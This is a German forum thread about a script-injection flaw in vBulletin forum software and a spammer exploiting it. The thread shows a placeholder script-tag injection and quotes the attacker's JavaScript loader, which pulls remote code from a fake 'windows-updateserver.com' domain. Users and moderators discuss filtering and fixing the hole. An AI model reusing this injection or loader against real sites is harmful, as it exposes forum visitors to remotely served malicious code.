ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.
ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.
Richtig. Ein Fehler(oder eine Fehlkonfiguration) in der Forensoftware sorgt dafür, dass man in den Postings ein
benutzen kann. Eine genauere Beschreibung des Exploit(inklusive "Mustecode") steht hierCode:{script} Hier Schadcode nach wahl {/script}
EDIT: Natürlich nehmen wir Spitze klammern für die Tags, aber selbst im "Code" Fenster werden die Scripte ausgeführt. Zumindest würde ich von Code erwarten, dass der Inhalt in jedem Fall plain durchgeht
achso...
ich dachte auch das die software sowas filtert....
naja...so schnell kanns gehen...kann man das aber nicht generell deaktivieren? das wird doch nicht wirklich gebraucht?
achso:)
kann man das nicht filtern? also das nur moderatoren scripte nutzen dürfen?
Daran wird derzeit gerade gearbeitet :)
Backdraft ist schon dran!
achso:)
gut dann hör ich auf mit nerven:D
Dem Kerl scheint echt langweilig zu sein.... der registriert sich den ganzen Tag in sämtlichen v-Bulletin-Foren, klinkt sich in irgendwelche Beiträge ein und steckt jedes mal das gleiche Script rein... welches dann so aussieht:
XXXXXript language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'>"+"script>")
Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)